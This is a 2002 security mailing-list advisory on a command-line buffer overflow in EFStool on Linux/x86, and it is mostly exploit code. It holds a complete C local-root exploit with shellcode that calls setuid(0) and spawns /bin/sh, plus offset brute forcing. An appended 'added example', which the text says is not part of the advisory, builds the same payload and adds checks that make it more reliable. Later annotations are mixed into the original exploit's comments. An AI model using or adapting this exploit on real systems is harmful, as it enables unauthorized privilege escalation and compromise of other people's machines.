[EXPL] EFStool Local Root Exploit for Linux/x86

From: support@securiteam.com
Date: 09/12/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 12 Sep 2002 08:24:05 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  EFStool Local Root Exploit for Linux/x86
------------------------------------------------------------------------

SUMMARY

EFStool has been found to contain a buffer overflow in its handling of its
first command-line argument. A local attacker who can run the binary with an
overlong argument can execute arbitrary code with the privileges of the
efstool binary. The vulnerability can be tested for with the exploit code
below. Note that EFStool is not setuid by default on the major Linux
flavors, so on a default install the shell it spawns runs as the invoking
user, not as root.

DETAILS

Exploit:
/* efstool.c - efstool/bof simple overflow in efstool,
 *
 *
 * This code is published property of CloudAss, you may
 * duplicate this in any shape or form without prior written
 * permission from CloudAss.
 *
 * Bug discovered by ntfx, just figured I'd code a decent
 * exploit for it.
 *
 *
 * DISCLAIMER - I am in no way affiliated with ntfx or any members of
 * soldierx or legion2002 security.
 *
 * Usage: ./efsroot offset - bruteforce if necessary
 *
 * Bug is pretty stupid, and simple, I have yet to see it give root.
 * efstool is not +s on slackware 8.0 , it should spawn a shell
 * regardless.
 *
 * (C) COPYRIGHT CloudAss , 2002
 * all rights reserved
 ***********************************************************************
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define SIZE 3000
#define NOP 0x90
#define PATH "/opt/gnome/bin/efstool"

//--------------------------------------------------
/* current stack pointer; the return address is guessed relative to it
 * (Linux/x86 only: build as a 32-bit binary) */
long get_esp(void)
{
    long esp;
    __asm__("movl %%esp,%0" : "=r"(esp));
    return esp;
}
//--------------------------------------------------

/* setuid(0), then execve("/bin/sh", {"/bin/sh", NULL}, NULL).
 * The stub writes its terminating NUL at offset 7 of the path string
 * (mov %al,0x7(%esi)), so the path must be exactly 7 bytes long:
 * the original "/bin/bash" was cut to "/bin/ba" and never execed. */
char shellcode[]=
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
char buffer[SIZE];
long retaddr, offset;
int i;

if (argc < 2) {
    fprintf(stderr, "Usage: %s offset\n", argv[0]);
    return 1;
}
offset = atoi(argv[1]);
retaddr = get_esp() + offset;

/* fill the whole buffer with the guessed return address ... */
for(i=0; i + (int)sizeof(retaddr) <= SIZE; i += sizeof(retaddr))
 *(long *)&buffer[i] = retaddr;

/* ... then a short NOP sled followed by the shellcode at the front */
for(i=0; i < (int)strlen(shellcode); i++)
*(buffer+i) = NOP;

memcpy(buffer+i, shellcode, strlen(shellcode));

/* argv[1] is a C string: it must be NUL-terminated, and the return
 * address must not contain a NUL byte or the target sees a short string */
buffer[SIZE-1] = '\0';
execl(PATH, "efstool", buffer, (char *)NULL);
perror("execl");
return 1;
}
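
The following is an added example, not part of the advisory and not
efstool's or CloudAss's code. It builds the same kind of argv[1] payload as
the exploit above and checks the three things the approach quietly depends
on: the sprayed return address must contain no NUL byte (argv strings end at
the first NUL), the repeated 4-byte address must be phase-aligned with the
saved return address it is meant to overwrite, and the target must actually
be setuid root for the resulting shell to be root. It assumes the advisory's
path and a classic setuid(0) plus execve("/bin/sh") stub; the stack
addresses in main() are made-up sample values, not measured ones.

```c
/* Added example, not part of the advisory or of efstool: builds an
 * efstool-style argv payload and checks the constraints an overflow
 * delivered through argv must satisfy. Addresses in main() are made-up. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#define PAYLOAD_SIZE 3000
#define NOP 0x90
#define TARGET "/opt/gnome/bin/efstool"   /* path from the advisory */

/* setuid(0) followed by the classic Linux/x86 execve("/bin/sh") stub.
 * The stub NUL-terminates the path at offset 7, so the path is 7 bytes. */
static const char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* argv strings are C strings: a NUL anywhere in the return address ends
 * the copy, so such an address can never be sprayed through argv[1]. */
int addr_is_argv_safe(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xff) == 0)
            return 0;
    return 1;
}

/* Length of the payload as the target sees it after execve(), i.e. up to
 * the first NUL byte. */
size_t argv_visible_len(const char *p, size_t size)
{
    size_t n = 0;
    while (n < size && p[n] != '\0')
        n++;
    return n;
}

/* Lay out [NOP sled][shellcode][retaddr retaddr ...] and NUL-terminate.
 * `align` (0-3) shifts the repeated little-endian address by that many
 * bytes: the 4-byte pattern only lands cleanly on the saved EIP if its
 * phase matches the distance from the target's buffer to that slot, so a
 * brute force that varies only the offset can miss for this reason alone.
 * Returns the string length written, or 0 if the layout is impossible. */
size_t build_payload(char *out, size_t size, uint32_t retaddr,
                     size_t sled_len, unsigned align)
{
    size_t sc_len = sizeof(shellcode) - 1;
    size_t len = size - 1;                  /* leave room for the NUL */

    if (size < 2 || !addr_is_argv_safe(retaddr) || sled_len + sc_len > len)
        return 0;
    for (size_t i = 0; i < len; i++)
        out[i] = (char)(retaddr >> (8 * ((i + 4 - (align & 3)) & 3)));
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, shellcode, sc_len);
    out[len] = '\0';
    return len;
}

/* The advisory's caveat in code: the shell is root only if the target is
 * setuid (mode bit 04000, S_ISUID) and owned by root.
 * Returns 1 = setuid root, 0 = not, -1 = cannot stat the path. */
int target_is_setuid_root(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & 04000) != 0 && st.st_uid == 0;
}

int main(void)
{
    static char payload[PAYLOAD_SIZE];
    uint32_t sample = 0xbffffa10u;          /* made-up stack address */
    size_t n = build_payload(payload, sizeof payload, sample, 64, 0);

    printf("payload bytes: %zu, visible to target: %zu\n",
           n, argv_visible_len(payload, sizeof payload));
    printf("0xbffff000 usable through argv? %s\n",
           addr_is_argv_safe(0xbffff000u) ? "yes" : "no");
    printf("%s setuid root: %d\n", TARGET, target_is_setuid_root(TARGET));
    return 0;
}
```

Running target_is_setuid_root() against the advisory's path first tells you
whether the exploit can do more than open a shell as yourself; if it is not
setuid root, the only thing left to test is whether the overflow is reachable.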

ADDITIONAL INFORMATION

The information has been provided by Cloudass <mailto:cloudass@kernel.net>.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
